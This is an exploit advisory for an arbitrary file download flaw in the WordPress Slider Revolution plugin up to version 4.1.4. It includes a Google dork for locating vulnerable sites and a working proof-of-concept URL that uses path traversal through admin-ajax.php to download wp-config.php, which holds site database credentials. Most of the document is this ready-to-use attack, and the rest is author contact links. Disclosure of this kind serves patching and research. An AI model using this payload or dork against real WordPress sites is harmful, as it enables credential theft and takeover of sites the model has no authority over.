WordPress Slider Revolution <= 4.1.4 Arbitrary File Download vulnerability

Wordpress Slider Revolution

######################
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"
               

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################

Discovered By : Claudio Viviani

        http://www.homelab.it
        info@homelab.it
        homelabit@protonmail.ch

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################